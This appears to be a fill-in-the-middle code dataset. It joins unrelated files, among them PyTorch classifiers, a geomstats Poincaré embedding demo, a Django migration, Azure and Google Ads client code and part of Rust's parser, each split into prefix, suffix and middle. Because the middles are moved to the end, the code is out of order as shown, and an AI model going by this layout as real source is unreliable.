self.fc2 = nn.Linear(hidden_layer_size, 512)
self.fc3_verb = nn.Linear(512, 97)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
if self.dropout_count >= 1:
x = self.dropout(x)
x = F.relu(self.fc2(x))
if self.dropout_count == 2:
x = self.dropout(x)
x = self.fc3_verb(x)
return x
class N_MTRN(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_count: int, dropout_probability: int = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.dropout_count = dropout_count
self.fc1 = nn.Linear(256 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2 = nn.Linear(hidden_layer_size, 512)
self.fc3_noun = nn.Linear(512, 300)
def forward(self, x):
x = x.view(-1, 256 * self.frame_count)
x = F.relu(self.fc1(x))
if self.dropout_count >= 1:
x = self.dropout(x)
x = F.relu(self.fc2(x))
if self.dropout_count == 2:
x = self.dropout(x)
x = self.fc3_noun(x)
return x
class V_MF(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_probability: int = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.fc1 = nn.Linear(768 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2_verb = nn.Linear(hidden_layer_size, 97)
| def forward(self, x):
x = x.view(-1, 768 * self.frame_count)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2_verb(x)
return x
class N_MF(nn.Module):
def __init__(self, frame_count: int, hidden_layer_size: int, dropout_probability: int = 0.5):
super().__init__()
if dropout_probability < 0 or dropout_probability > 1:
raise ValueError(f'Probability needs to be between 0 and 1, was: {dropout_probability}')
self.frame_count = frame_count
self.fc1 = nn.Linear(768 * frame_count, hidden_layer_size)
self.dropout = nn.Dropout(p=dropout_probability)
self.fc2_noun = nn.Linear(hidden_layer_size, 300)
def forward(self, x):
x = x.view(-1, 768 * self.frame_count)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = self.fc2_noun(x)
return x | |
learning_graph_embedding_and_predicting.py | """Learning embedding of graph using Poincare Ball Model."""
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import geomstats.backend as gs
import geomstats.visualization as visualization
from geomstats.datasets.prepare_graph_data import HyperbolicEmbedding
from geomstats.datasets.utils import load_karate_graph
from geomstats.learning.kmeans import RiemannianKMeans
from geomstats.learning.kmedoids import RiemannianKMedoids
def main():
|
if __name__ == "__main__":
main()
| """Learning Poincaré graph embedding.
Learns Poincaré Ball embedding by using Riemannian
gradient descent algorithm. Then K-means is applied
to learn labels of each data sample.
"""
gs.random.seed(1234)
karate_graph = load_karate_graph()
hyperbolic_embedding = HyperbolicEmbedding(max_epochs=3)
embeddings = hyperbolic_embedding.embed(karate_graph)
colors = {1: "b", 2: "r"}
group_1 = mpatches.Patch(color=colors[1], label="Group 1")
group_2 = mpatches.Patch(color=colors[2], label="Group 2")
circle = visualization.PoincareDisk(point_type="ball")
_, ax = plt.subplots(figsize=(8, 8))
ax.axes.xaxis.set_visible(False)
ax.axes.yaxis.set_visible(False)
circle.set_ax(ax)
circle.draw(ax=ax)
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
plt.scatter(x_coords, y_coords, c=colors[karate_graph.labels[pt_id][0]], s=150)
ax.annotate(pt_id, (x_coords, y_coords))
plt.tick_params(which="both")
plt.title("Poincare Ball Embedding of the Karate Club Network")
plt.legend(handles=[group_1, group_2])
plt.show()
n_clusters = 2
kmeans = RiemannianKMeans(
metric=hyperbolic_embedding.manifold.metric,
n_clusters=n_clusters,
init="random",
)
centroids = kmeans.fit(X=embeddings)
labels = kmeans.predict(X=embeddings)
colors = ["g", "c", "m"]
circle = visualization.PoincareDisk(point_type="ball")
_, ax2 = plt.subplots(figsize=(8, 8))
circle.set_ax(ax2)
circle.draw(ax=ax2)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
group_1_predicted = mpatches.Patch(color=colors[0], label="Predicted Group 1")
group_2_predicted = mpatches.Patch(color=colors[1], label="Predicted Group 2")
group_centroids = mpatches.Patch(color=colors[2], label="Cluster centroids")
for _ in range(n_clusters):
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
if labels[i_embedding] == 0:
color = colors[0]
else:
color = colors[1]
plt.scatter(x_coords, y_coords, c=color, s=150)
ax2.annotate(pt_id, (x_coords, y_coords))
for _, centroid in enumerate(centroids):
x_coords = centroid[0]
y_coords = centroid[1]
plt.scatter(
x_coords,
y_coords,
c=colors[2],
marker="*",
s=150,
)
plt.title("K-means applied to Karate club embedding")
plt.legend(handles=[group_1_predicted, group_2_predicted, group_centroids])
plt.show()
kmedoid = RiemannianKMedoids(
metric=hyperbolic_embedding.manifold.metric,
n_clusters=n_clusters,
init="random",
n_jobs=2,
)
centroids = kmedoid.fit(data=embeddings, max_iter=100)
labels = kmedoid.predict(data=embeddings)
colors = ["g", "c", "m"]
circle = visualization.PoincareDisk(point_type="ball")
_, ax2 = plt.subplots(figsize=(8, 8))
circle.set_ax(ax2)
circle.draw(ax=ax2)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
group_1_predicted = mpatches.Patch(color=colors[0], label="Predicted Group 1")
group_2_predicted = mpatches.Patch(color=colors[1], label="Predicted Group 2")
group_centroids = mpatches.Patch(color=colors[2], label="Cluster centroids")
for _ in range(n_clusters):
for i_embedding, embedding in enumerate(embeddings):
x_coords = embedding[0]
y_coords = embedding[1]
pt_id = i_embedding
if labels[i_embedding] == 0:
color = colors[0]
else:
color = colors[1]
plt.scatter(x_coords, y_coords, c=color, s=150)
ax2.annotate(pt_id, (x_coords, y_coords))
for _, centroid in enumerate(centroids):
x_coords = centroid[0]
y_coords = centroid[1]
plt.scatter(
x_coords,
y_coords,
c=colors[2],
marker="*",
s=150,
)
plt.title("K-Medoids applied to Karate club embedding")
plt.legend(handles=[group_1_predicted, group_2_predicted, group_centroids])
plt.show()
|
0001_initial.py | # Generated by Django 2.2.3 on 2019-07-27 12:22
from django.db import migrations, models
class | (migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='DepModO2O',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('placeholder', models.BooleanField(default=True)),
],
),
]
| Migration |
ze_generated_example_integrationruntimenodeipaddress_client_test.go | //go:build go1.18
// +build go1.18
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
// Code generated by Microsoft (R) AutoRest Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
package armsynapse_test
import (
"context"
"log"
"github.com/Azure/azure-sdk-for-go/sdk/azidentity"
"github.com/Azure/azure-sdk-for-go/sdk/resourcemanager/synapse/armsynapse"
)
// Generated from example definition: https://github.com/Azure/azure-rest-api-specs/tree/main/specification/synapse/resource-manager/Microsoft.Synapse/preview/2021-06-01-preview/examples/IntegrationRuntimeNodes_GetIpAddress.json
func ExampleIntegrationRuntimeNodeIPAddressClient_Get() {
cred, err := azidentity.NewDefaultAzureCredential(nil)
if err != nil {
log.Fatalf("failed to obtain a credential: %v", err)
}
ctx := context.Background()
client, err := armsynapse.NewIntegrationRuntimeNodeIPAddressClient("<subscription-id>", cred, nil)
if err != nil {
log.Fatalf("failed to create client: %v", err)
}
res, err := client.Get(ctx,
"<resource-group-name>",
"<workspace-name>",
"<integration-runtime-name>", | "<node-name>",
nil)
if err != nil {
log.Fatalf("failed to finish the request: %v", err)
}
// TODO: use response item
_ = res
} | |
grpc.py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v7.resources.types import ad_group_simulation
from google.ads.googleads.v7.services.types import ad_group_simulation_service
from .base import AdGroupSimulationServiceTransport, DEFAULT_CLIENT_INFO
class AdGroupSimulationServiceGrpcTransport(AdGroupSimulationServiceTransport):
"""gRPC backend transport for AdGroupSimulationService.
Service to fetch ad group simulations.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def | (self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_ad_group_simulation(
self,
) -> Callable[
[ad_group_simulation_service.GetAdGroupSimulationRequest],
ad_group_simulation.AdGroupSimulation,
]:
r"""Return a callable for the
get ad group simulation
method over gRPC.
Returns the requested ad group simulation in full detail.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetAdGroupSimulationRequest],
~.AdGroupSimulation]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_ad_group_simulation" not in self._stubs:
self._stubs[
"get_ad_group_simulation"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v7.services.AdGroupSimulationService/GetAdGroupSimulation",
request_serializer=ad_group_simulation_service.GetAdGroupSimulationRequest.serialize,
response_deserializer=ad_group_simulation.AdGroupSimulation.deserialize,
)
return self._stubs["get_ad_group_simulation"]
__all__ = ("AdGroupSimulationServiceGrpcTransport",)
| grpc_channel |
parser.rs | // ignore-tidy-filelength
use crate::ast::{AngleBracketedArgs, ParenthesizedArgs, AttrStyle, BareFnTy};
use crate::ast::{GenericBound, TraitBoundModifier};
use crate::ast::Unsafety;
use crate::ast::{Mod, AnonConst, Arg, Arm, Guard, Attribute, BindingMode, TraitItemKind};
use crate::ast::Block;
use crate::ast::{BlockCheckMode, CaptureBy, Movability};
use crate::ast::{Constness, Crate};
use crate::ast::Defaultness;
use crate::ast::EnumDef;
use crate::ast::{Expr, ExprKind, RangeLimits};
use crate::ast::{Field, FnDecl, FnHeader};
use crate::ast::{ForeignItem, ForeignItemKind, FunctionRetTy};
use crate::ast::{GenericParam, GenericParamKind};
use crate::ast::GenericArg;
use crate::ast::{Ident, ImplItem, IsAsync, IsAuto, Item, ItemKind};
use crate::ast::{Label, Lifetime};
use crate::ast::Local;
use crate::ast::MacStmtStyle;
use crate::ast::{Mac, Mac_, MacDelimiter};
use crate::ast::{MutTy, Mutability};
use crate::ast::{Pat, PatKind, PathSegment};
use crate::ast::{PolyTraitRef, QSelf};
use crate::ast::{Stmt, StmtKind};
use crate::ast::{VariantData, StructField};
use crate::ast::StrStyle;
use crate::ast::SelfKind;
use crate::ast::{TraitItem, TraitRef, TraitObjectSyntax};
use crate::ast::{Ty, TyKind, AssocTyConstraint, AssocTyConstraintKind, GenericBounds};
use crate::ast::{Visibility, VisibilityKind, WhereClause, CrateSugar};
use crate::ast::{UseTree, UseTreeKind};
use crate::ast::{BinOpKind, UnOp};
use crate::ast::{RangeEnd, RangeSyntax};
use crate::{ast, attr};
use crate::ext::base::DummyResult;
use crate::source_map::{self, SourceMap, Spanned, respan};
use crate::parse::{SeqSep, classify, literal, token};
use crate::parse::lexer::{TokenAndSpan, UnmatchedBrace};
use crate::parse::lexer::comments::{doc_comment_style, strip_doc_comment_decoration};
use crate::parse::token::DelimToken;
use crate::parse::{new_sub_parser_from_file, ParseSess, Directory, DirectoryOwnership};
use crate::util::parser::{AssocOp, Fixity};
use crate::print::pprust;
use crate::ptr::P;
use crate::parse::PResult;
use crate::ThinVec;
use crate::tokenstream::{self, DelimSpan, TokenTree, TokenStream, TreeAndJoint};
use crate::symbol::{kw, sym, Symbol};
use crate::parse::diagnostics::{Error, dummy_arg};
use errors::{Applicability, DiagnosticBuilder, DiagnosticId, FatalError};
use rustc_target::spec::abi::{self, Abi};
use syntax_pos::{Span, BytePos, DUMMY_SP, FileName};
use log::debug;
use std::borrow::Cow;
use std::cmp;
use std::mem;
use std::path::{self, Path, PathBuf};
use std::slice;
#[derive(Debug)]
/// Whether the type alias or associated type is a concrete type or an existential type
pub enum AliasKind {
/// Just a new name for the same type
Weak(P<Ty>),
/// Only trait impls of the type will be usable, not the actual type itself
Existential(GenericBounds),
}
bitflags::bitflags! {
struct Restrictions: u8 {
const STMT_EXPR = 1 << 0;
const NO_STRUCT_LITERAL = 1 << 1;
}
}
type ItemInfo = (Ident, ItemKind, Option<Vec<Attribute>>);
/// Specifies how to parse a path.
#[derive(Copy, Clone, PartialEq)]
pub enum PathStyle {
/// In some contexts, notably in expressions, paths with generic arguments are ambiguous
/// with something else. For example, in expressions `segment < ....` can be interpreted
/// as a comparison and `segment ( ....` can be interpreted as a function call.
/// In all such contexts the non-path interpretation is preferred by default for practical
/// reasons, but the path interpretation can be forced by the disambiguator `::`, e.g.
/// `x<y>` - comparisons, `x::<y>` - unambiguously a path.
Expr,
/// In other contexts, notably in types, no ambiguity exists and paths can be written
/// without the disambiguator, e.g., `x<y>` - unambiguously a path.
/// Paths with disambiguators are still accepted, `x::<Y>` - unambiguously a path too.
Type,
/// A path with generic arguments disallowed, e.g., `foo::bar::Baz`, used in imports,
/// visibilities or attributes.
/// Technically, this variant is unnecessary and e.g., `Expr` can be used instead
/// (paths in "mod" contexts have to be checked later for absence of generic arguments
/// anyway, due to macros), but it is used to avoid weird suggestions about expected
/// tokens when something goes wrong.
Mod,
}
#[derive(Clone, Copy, PartialEq, Debug)]
crate enum SemiColonMode {
Break,
Ignore,
Comma,
}
#[derive(Clone, Copy, PartialEq, Debug)]
crate enum BlockMode {
Break,
Ignore,
}
/// Possibly accepts an `token::Interpolated` expression (a pre-parsed expression
/// dropped into the token stream, which happens while parsing the result of
/// macro expansion). Placement of these is not as complex as I feared it would
/// be. The important thing is to make sure that lookahead doesn't balk at
/// `token::Interpolated` tokens.
macro_rules! maybe_whole_expr {
($p:expr) => {
if let token::Interpolated(nt) = &$p.token {
match &**nt {
token::NtExpr(e) | token::NtLiteral(e) => {
let e = e.clone();
$p.bump();
return Ok(e);
}
token::NtPath(path) => {
let path = path.clone();
$p.bump();
return Ok($p.mk_expr($p.span, ExprKind::Path(None, path), ThinVec::new()));
}
token::NtBlock(block) => {
let block = block.clone();
$p.bump();
return Ok($p.mk_expr($p.span, ExprKind::Block(block, None), ThinVec::new()));
}
_ => {},
};
}
}
}
/// As maybe_whole_expr, but for things other than expressions
macro_rules! maybe_whole {
($p:expr, $constructor:ident, |$x:ident| $e:expr) => {
if let token::Interpolated(nt) = &$p.token {
if let token::$constructor(x) = &**nt {
let $x = x.clone();
$p.bump();
return Ok($e);
}
}
};
}
/// If the next tokens are ill-formed `$ty::` recover them as `<$ty>::`.
macro_rules! maybe_recover_from_interpolated_ty_qpath {
($self: expr, $allow_qpath_recovery: expr) => {
if $allow_qpath_recovery && $self.look_ahead(1, |t| t == &token::ModSep) {
if let token::Interpolated(nt) = &$self.token {
if let token::NtTy(ty) = &**nt {
let ty = ty.clone();
$self.bump();
return $self.maybe_recover_from_bad_qpath_stage_2($self.prev_span, ty);
}
}
}
}
}
fn maybe_append(mut lhs: Vec<Attribute>, mut rhs: Option<Vec<Attribute>>) -> Vec<Attribute> {
if let Some(ref mut rhs) = rhs {
lhs.append(rhs);
}
lhs
}
#[derive(Debug, Clone, Copy, PartialEq)]
enum PrevTokenKind {
DocComment,
Comma,
Plus,
Interpolated,
Eof,
Ident,
BitOr,
Other,
}
// NOTE: `Ident`s are handled by `common.rs`.
#[derive(Clone)]
pub struct Parser<'a> {
pub sess: &'a ParseSess,
/// The current token.
pub token: token::Token,
/// The span of the current token.
pub span: Span,
meta_var_span: Option<Span>,
/// The span of the previous token.
pub prev_span: Span,
/// The kind of the previous troken.
prev_token_kind: PrevTokenKind,
restrictions: Restrictions,
/// Used to determine the path to externally loaded source files.
crate directory: Directory<'a>,
/// `true` to parse sub-modules in other files.
pub recurse_into_file_modules: bool,
/// Name of the root module this parser originated from. If `None`, then the
/// name is not known. This does not change while the parser is descending
/// into modules, and sub-parsers have new values for this name.
pub root_module_name: Option<String>,
crate expected_tokens: Vec<TokenType>,
crate token_cursor: TokenCursor,
desugar_doc_comments: bool,
/// `true` we should configure out of line modules as we parse.
pub cfg_mods: bool,
/// This field is used to keep track of how many left angle brackets we have seen. This is
/// required in order to detect extra leading left angle brackets (`<` characters) and error
/// appropriately.
///
/// See the comments in the `parse_path_segment` function for more details.
crate unmatched_angle_bracket_count: u32,
crate max_angle_bracket_count: u32,
/// List of all unclosed delimiters found by the lexer. If an entry is used for error recovery
/// it gets removed from here. Every entry left at the end gets emitted as an independent
/// error.
crate unclosed_delims: Vec<UnmatchedBrace>,
crate last_unexpected_token_span: Option<Span>,
/// If present, this `Parser` is not parsing Rust code but rather a macro call.
crate subparser_name: Option<&'static str>,
}
impl<'a> Drop for Parser<'a> {
fn drop(&mut self) {
let diag = self.diagnostic();
emit_unclosed_delims(&mut self.unclosed_delims, diag);
}
}
#[derive(Clone)]
crate struct TokenCursor {
crate frame: TokenCursorFrame,
crate stack: Vec<TokenCursorFrame>,
}
#[derive(Clone)]
crate struct TokenCursorFrame {
crate delim: token::DelimToken,
crate span: DelimSpan,
crate open_delim: bool,
crate tree_cursor: tokenstream::Cursor,
crate close_delim: bool,
crate last_token: LastToken,
}
/// This is used in `TokenCursorFrame` above to track tokens that are consumed
/// by the parser, and then that's transitively used to record the tokens that
/// each parse AST item is created with.
///
/// Right now this has two states, either collecting tokens or not collecting
/// tokens. If we're collecting tokens we just save everything off into a local
/// `Vec`. This should eventually though likely save tokens from the original
/// token stream and just use slicing of token streams to avoid creation of a
/// whole new vector.
///
/// The second state is where we're passively not recording tokens, but the last
/// token is still tracked for when we want to start recording tokens. This
/// "last token" means that when we start recording tokens we'll want to ensure
/// that this, the first token, is included in the output.
///
/// You can find some more example usage of this in the `collect_tokens` method
/// on the parser.
#[derive(Clone)]
crate enum LastToken {
Collecting(Vec<TreeAndJoint>),
Was(Option<TreeAndJoint>),
}
impl TokenCursorFrame {
fn new(sp: DelimSpan, delim: DelimToken, tts: &TokenStream) -> Self {
TokenCursorFrame {
delim: delim,
span: sp,
open_delim: delim == token::NoDelim,
tree_cursor: tts.clone().into_trees(),
close_delim: delim == token::NoDelim,
last_token: LastToken::Was(None),
}
}
}
impl TokenCursor {
fn next(&mut self) -> TokenAndSpan {
loop {
let tree = if !self.frame.open_delim {
self.frame.open_delim = true;
TokenTree::open_tt(self.frame.span.open, self.frame.delim)
} else if let Some(tree) = self.frame.tree_cursor.next() {
tree
} else if !self.frame.close_delim {
self.frame.close_delim = true;
TokenTree::close_tt(self.frame.span.close, self.frame.delim)
} else if let Some(frame) = self.stack.pop() {
self.frame = frame;
continue
} else {
return TokenAndSpan { tok: token::Eof, sp: DUMMY_SP }
};
match self.frame.last_token {
LastToken::Collecting(ref mut v) => v.push(tree.clone().into()),
LastToken::Was(ref mut t) => *t = Some(tree.clone().into()),
}
match tree {
TokenTree::Token(sp, tok) => return TokenAndSpan { tok: tok, sp: sp },
TokenTree::Delimited(sp, delim, tts) => {
let frame = TokenCursorFrame::new(sp, delim, &tts);
self.stack.push(mem::replace(&mut self.frame, frame));
}
}
}
}
fn next_desugared(&mut self) -> TokenAndSpan {
let (sp, name) = match self.next() {
TokenAndSpan { sp, tok: token::DocComment(name) } => (sp, name),
tok => return tok,
};
let stripped = strip_doc_comment_decoration(&name.as_str());
// Searches for the occurrences of `"#*` and returns the minimum number of `#`s
// required to wrap the text.
let mut num_of_hashes = 0;
let mut count = 0;
for ch in stripped.chars() {
count = match ch {
'"' => 1,
'#' if count > 0 => count + 1,
_ => 0,
};
num_of_hashes = cmp::max(num_of_hashes, count);
}
let delim_span = DelimSpan::from_single(sp);
let body = TokenTree::Delimited(
delim_span,
token::Bracket,
[
TokenTree::Token(sp, token::Ident(ast::Ident::with_empty_ctxt(sym::doc), false)),
TokenTree::Token(sp, token::Eq),
TokenTree::Token(sp, token::Token::lit(
token::StrRaw(num_of_hashes), Symbol::intern(&stripped), None
)),
]
.iter().cloned().collect::<TokenStream>().into(),
);
self.stack.push(mem::replace(&mut self.frame, TokenCursorFrame::new(
delim_span,
token::NoDelim,
&if doc_comment_style(&name.as_str()) == AttrStyle::Inner {
[TokenTree::Token(sp, token::Pound), TokenTree::Token(sp, token::Not), body]
.iter().cloned().collect::<TokenStream>().into()
} else {
[TokenTree::Token(sp, token::Pound), body]
.iter().cloned().collect::<TokenStream>().into()
},
)));
self.next()
}
}
#[derive(Clone, PartialEq)]
crate enum TokenType {
Token(token::Token),
Keyword(Symbol),
Operator,
Lifetime,
Ident,
Path,
Type,
Const,
}
impl TokenType {
crate fn to_string(&self) -> String {
match *self {
TokenType::Token(ref t) => format!("`{}`", pprust::token_to_string(t)),
TokenType::Keyword(kw) => format!("`{}`", kw),
TokenType::Operator => "an operator".to_string(),
TokenType::Lifetime => "lifetime".to_string(),
TokenType::Ident => "identifier".to_string(),
TokenType::Path => "path".to_string(),
TokenType::Type => "type".to_string(),
TokenType::Const => "const".to_string(),
}
}
}
/// Returns `true` if `IDENT t` can start a type -- `IDENT::a::b`, `IDENT<u8, u8>`,
/// `IDENT<<u8 as Trait>::AssocTy>`.
///
/// Types can also be of the form `IDENT(u8, u8) -> u8`, however this assumes
/// that `IDENT` is not the ident of a fn trait.
fn can_continue_type_after_non_fn_ident(t: &token::Token) -> bool {
t == &token::ModSep || t == &token::Lt ||
t == &token::BinOp(token::Shl)
}
/// Information about the path to a module.
pub struct ModulePath {
name: String,
path_exists: bool,
pub result: Result<ModulePathSuccess, Error>,
}
pub struct ModulePathSuccess {
pub path: PathBuf,
pub directory_ownership: DirectoryOwnership,
warn: bool,
}
#[derive(Debug)]
enum LhsExpr {
NotYetParsed,
AttributesParsed(ThinVec<Attribute>),
AlreadyParsed(P<Expr>),
}
impl From<Option<ThinVec<Attribute>>> for LhsExpr {
fn from(o: Option<ThinVec<Attribute>>) -> Self {
if let Some(attrs) = o {
LhsExpr::AttributesParsed(attrs)
} else {
LhsExpr::NotYetParsed
}
}
}
impl From<P<Expr>> for LhsExpr {
fn from(expr: P<Expr>) -> Self {
LhsExpr::AlreadyParsed(expr)
}
}
#[derive(Copy, Clone, Debug)]
crate enum TokenExpectType {
Expect,
NoExpect,
}
impl<'a> Parser<'a> {
pub fn new(
sess: &'a ParseSess,
tokens: TokenStream,
directory: Option<Directory<'a>>,
recurse_into_file_modules: bool,
desugar_doc_comments: bool,
subparser_name: Option<&'static str>,
) -> Self {
let mut parser = Parser {
sess,
token: token::Whitespace,
span: DUMMY_SP,
prev_span: DUMMY_SP,
meta_var_span: None,
prev_token_kind: PrevTokenKind::Other,
restrictions: Restrictions::empty(),
recurse_into_file_modules,
directory: Directory {
path: Cow::from(PathBuf::new()),
ownership: DirectoryOwnership::Owned { relative: None }
},
root_module_name: None,
expected_tokens: Vec::new(),
token_cursor: TokenCursor {
frame: TokenCursorFrame::new(
DelimSpan::dummy(),
token::NoDelim,
&tokens.into(),
),
stack: Vec::new(),
},
desugar_doc_comments,
cfg_mods: true,
unmatched_angle_bracket_count: 0,
max_angle_bracket_count: 0,
unclosed_delims: Vec::new(),
last_unexpected_token_span: None,
subparser_name,
};
let tok = parser.next_tok();
parser.token = tok.tok;
parser.span = tok.sp;
if let Some(directory) = directory {
parser.directory = directory;
} else if !parser.span.is_dummy() {
if let FileName::Real(mut path) = sess.source_map().span_to_unmapped_path(parser.span) {
path.pop();
parser.directory.path = Cow::from(path);
}
}
parser.process_potential_macro_variable();
parser
}
fn next_tok(&mut self) -> TokenAndSpan {
let mut next = if self.desugar_doc_comments {
self.token_cursor.next_desugared()
} else {
self.token_cursor.next()
};
if next.sp.is_dummy() {
// Tweak the location for better diagnostics, but keep syntactic context intact.
next.sp = self.prev_span.with_ctxt(next.sp.ctxt());
}
next
}
/// Converts the current token to a string using `self`'s reader.
pub fn this_token_to_string(&self) -> String {
pprust::token_to_string(&self.token)
}
crate fn token_descr(&self) -> Option<&'static str> {
Some(match &self.token {
t if t.is_special_ident() => "reserved identifier",
t if t.is_used_keyword() => "keyword",
t if t.is_unused_keyword() => "reserved keyword",
token::DocComment(..) => "doc comment",
_ => return None,
})
}
crate fn this_token_descr(&self) -> String {
if let Some(prefix) = self.token_descr() {
format!("{} `{}`", prefix, self.this_token_to_string())
} else {
format!("`{}`", self.this_token_to_string())
}
}
crate fn unexpected<T>(&mut self) -> PResult<'a, T> {
match self.expect_one_of(&[], &[]) {
Err(e) => Err(e),
Ok(_) => unreachable!(),
}
}
/// Expects and consumes the token `t`. Signals an error if the next token is not `t`.
